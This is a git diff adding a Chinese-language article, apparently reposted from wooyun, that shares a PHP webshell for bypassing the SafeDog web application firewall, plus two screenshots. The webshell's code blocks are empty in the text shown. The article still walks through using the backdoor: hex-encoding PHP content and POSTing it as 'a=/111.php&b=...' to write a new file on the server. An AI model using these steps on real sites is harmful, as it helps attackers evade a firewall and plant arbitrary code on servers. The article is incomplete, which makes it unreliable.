diff --git a/php/img/20140901-01.png b/php/img/20140901-01.png new file mode 100644 index 0000000..a29c19a Binary files /dev/null and b/php/img/20140901-01.png differ diff --git a/php/img/20140901-02.png b/php/img/20140901-02.png new file mode 100644 index 0000000..0cff68d Binary files /dev/null and b/php/img/20140901-02.png differ diff --git a/php/phpwebshell pass by waf for share.md b/php/phpwebshell pass by waf for share.md new file mode 100644 index 0000000..10e8650 --- /dev/null +++ b/php/phpwebshell pass by waf for share.md @@ -0,0 +1,56 @@ +php绕过安全狗检测的小马分享 + +zph | 2014-08-28 15:10 + + +直接上代码: + + + + +分析利用&过狗: + + + + +利用方法: + +将写入的内容用url编码,比如 + + + +编码后为: + + %3C%3F%70%68%70%20%70%68%70%69%6E%66%6F%28%29%3B%3F%3E + +去掉其中的%,得到: + + 3C3F70687020706870696E666F28293B3F3E + +然后访问后门,将POST内容改为: + + a=/111.php&b=3C3F70687020706870696E666F28293B3F3E + +即可写入内容 + +过狗: + ![test](./img/20140901-01.png) + + ![test](./img/20140901-02.png) + + +url:http://zone.wooyun.org/content/14846